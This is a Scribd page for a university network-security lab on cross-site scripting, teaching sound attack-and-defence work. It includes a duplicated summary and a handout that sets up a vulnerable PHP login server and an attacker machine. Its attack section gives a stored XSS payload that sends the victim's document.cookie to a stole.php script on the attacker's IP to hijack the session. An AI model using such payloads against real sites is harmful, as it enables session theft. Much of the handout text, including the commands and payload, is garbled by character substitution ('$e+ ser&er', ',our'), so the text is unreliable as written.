Scribd
Upload
31 views

LAB X: Cross Site Scripting Attack: Vul Server (IP1)

This document provides instructions for setting up a network with three virtual machines to demonstrate a cross-site scripting (XSS) attack. It describes configuring an Apache web server with enabled PHP and MySQL on the "Secure Server" machine. Files like index.php and login.php are copied to directories to implement a login system. The "User Machine" and "Attacker Machine" have Firefox installed. Normally a user must login correctly to view protected pages, but the attacker aims to steal the user's session ID thanks to an XSS vulnerability in a file called xssvul.php. Entering malicious JavaScript code into that file allows stealing and viewing the user's cookie.

Uploaded by

Tran Nguyen Quynh Tram
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
31 views

LAB X: Cross Site Scripting Attack: Vul Server (IP1)

This document provides instructions for setting up a network with three virtual machines to demonstrate a cross-site scripting (XSS) attack. It describes configuring an Apache web server with enabled PHP and MySQL on the "Secure Server" machine. Files like index.php and login.php are copied to directories to implement a login system. The "User Machine" and "Attacker Machine" have Firefox installed. Normally a user must login correctly to view protected pages, but the attacker aims to steal the user's session ID thanks to an XSS vulnerability in a file called xssvul.php. Entering malicious JavaScript code into that file allows stealing and viewing the user's cookie.

Uploaded by

Tran Nguyen Quynh Tram
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
You are on page 1/ 2

INTERNATIONAL UNIVERSITY School of Computer Science and Engineering LAB x: Cross Site Scripting Attack Course !

ate Network and System Security Lecturer !uration Pham Van Hau,PhD 135 minutes

Student I!"""""""""""""""""""""""""""""""""""""""""""" Introduction

Student name########

Vul Ser&er 'I-)*

User /achine 'I-@*

.ac%er 'I-9*

Set up a net$or% that consists of three &irtual machines 'as depicted in (igure )* in $hich Secure Server is a $e+ ser&er po$ered +, apache $ith -.- and /,S0L ena+le" In the home director, of ,our $e+ ser&er 'for Apache1 it is 2&ar2$$$2* Create the director, called 3admin4 '2&ar2$$$2admin*" Cop, three files inde5"php1 login"php1 and protected"php to 2&ar2$$$2admin Cop, the 5ss&ul"php to 2&ar2$$$2 Create the messages ta+le in the /,S0L ser&er1 login to ,our /,S0L ser&er CREATE TA6LE I( NOT E7ISTS 8messages 8 ' 8NA/E8 &archar'9:*1 8/essage 8 longte5t * EN;INE</,ISA/ !E(AULT C.ARSET<latin) AUTO=INCRE/ENT<)9 > User and Attacker are t$o machines $ith firefo5 installed" Normall,1 ,ou need to enter the correct username and pass$ord in the login"php page in order to load the protected"php page" The attac%er 'on attac%er machine* does not %no$ the user name and pass$ord of the secure ser&er

Normal Operation (rom machine 3User /achine41 Enter http 22ip)2admin2inde5"php to the $e+ +ro$ser +ar" Enter the username as 35ss4 and 3pass4 as pass$ord" After entering the correct username and pass$ord1 $e+ ser&er creates a session identification and gi&es it to the $e+ +ro$ser" E&er, time1 the $e+ +ro$ser $ants to &ie$ the http 22ip)2admin2protected"php1 it must sho$ the session identification" To &ie$ the session identification1 ,ou can enter 3?a&ascript alert'document"coo%ie*4 to the +ro$sing +ar of ,our $e+ +ro$ser"

Attack (rom the attac%er machine1 the attac%er $ants to steal the session identification of the user from 3User /achine4" This can +e done than%s to the 7SS &ulnera+ilit, of the page

http 22ip)25ss&ul"php" Indeed1 tr, to enter the follo$ing information to the page" Name<Test /essage<A?a&ascriptB alert'3test4*A2?a&ascriptB
No$1 tr, to enter the follo$ing te5t to the message +o5 and clic% on the 3Clic% here4" Aa href<CDC onclic%<C$indo$"location<EFhttp 22I-9 2stole"phpGte5t<EFHescape'document"coo%ie*> return false>CBClic% hereIA2aB (Stole.php sa es the cookie!

You might also like